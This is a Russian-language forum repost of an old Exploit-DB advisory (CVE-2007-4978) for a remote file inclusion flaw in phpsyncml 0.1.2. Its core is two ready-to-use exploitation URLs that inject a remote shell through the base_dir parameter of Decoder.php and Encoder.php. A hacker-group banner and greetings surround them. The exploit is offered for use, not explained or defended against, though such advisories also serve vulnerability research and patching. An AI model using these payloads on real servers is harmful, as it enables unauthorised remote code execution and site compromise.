Exploit phpsyncml 0.1.2 - Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4421
Проверка EDB
  1. Пройдено
Автор
S.W.A.T.
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-4978
Дата публикации
2007-09-18
Код:
========================================================================
||  ##    ##   ##           ##########   #######     ########         ||
||   ##  ##    ##########   ##########   ##   ##     ##               ||
||    ####     ##########   ##      ##   #######     ########         ||
||    ####     ##  ##  ##   ##      ##   #######           ##         ||
||   ##  ##    ##  ##  ##   ##########   ##    ##          ##         ||
||  ##    ##   ##  ##  ##   ##########   ##     ##   ########         ||
========================================================================
========================================================================
[*] phpsyncml <= 0.1.2   Remote File Include Vulnerability            ||
[!] Application homepage :                                            ||
kent.dl.sourceforge.net/sourceforge/phpsyncml/phpsyncml-0.1.2.tar.bz2 ||
[!] Author               :  S.W.A.T.                                  ||
[!] Site                 :  wWw.XmorS.CoM                             ||
[!] Y!ID                 :  Svvateam                                  ||
[!] E-Mail               :  [email protected]                    ||
[!] Location             :  Iran - 071                                ||
[!] Risk                 :  Moderate ( High )                         ||
[!] Dork                 :   :(                                       ||
========================================================================
========================================================================
Vuln. code: wbxml/WBXML/Decoder.php & Encoder.php	              ||
                                                                      ||
========================================================================
[*] Exploitation :                                                    ||
                                                                      ||
[target]/[path]/wbxml/WBXML/Decoder.php?base_dir=[Shell]              ||
[target]/[path]/wbxml/WBXML/Encoder.php?base_dir=[Shell]              ||
========================================================================
[!] We Are : Scorpiunix - Kamy4r - S.W.A.T. - D3vil_B0Y_Ir -          ||
[!] The_Editor - Silliconic - Sh3llH3ll                               ||
                                                                      ||
[!] I Love Xmors & All Member Of Them                                 ||
							              ||
[!] DeltaHackingGroup = ( Lammers Group :D ) ,,!,,                    ||
							              ||
[!] Special Thanks To : Dj7xpl From Y! UnderGround Group              ||
								      ||
[!] Tnx 2 : Str0ke - Google - SourceForge                             ||
========================================================================
# Xmors.Com [2007-09-18]

# milw0rm.com [2007-09-18]
 
Источник
www.exploit-db.com

Похожие темы